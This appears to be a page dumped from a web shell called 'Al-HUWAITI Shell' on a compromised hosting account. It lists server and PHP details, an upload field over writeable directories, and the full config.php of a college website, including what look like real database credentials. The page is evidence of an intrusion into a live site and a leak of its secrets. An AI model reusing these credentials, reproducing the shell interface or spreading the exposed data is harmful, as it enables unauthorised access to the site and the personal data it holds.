Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux server.xvl.jdw.mybluehostin.me 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64
User : exam ( 1029)
PHP Version : 8.2.30
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/exam/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/exam/public_html/config.php
<?php 
ob_start();
session_start();
date_default_timezone_set("Asia/Calcutta");
$base_url = "https://nsprgdcwhindupur.ac.in/";

$admin_url = "https://nsprgdcwhindupur.ac.in/admin/";

include 'admin/library/class.db.php';

// Construct
$db = new DB('mysql', 'exam_data', 'localhost', 'exam_user', '0oQxsEFVQIFy?&0s');

include 'admin/library/common-functions.php';

 
$news = $db->selectAll('news', '*', 'ORDER BY id DESC');
$slides = $db->selectAll('slides', '*', 'ORDER BY sort_order ASC');
$departments = $db->selectAll('departments', '*', 'ORDER BY sort_order ASC');
?>

Al-HUWAITI Shell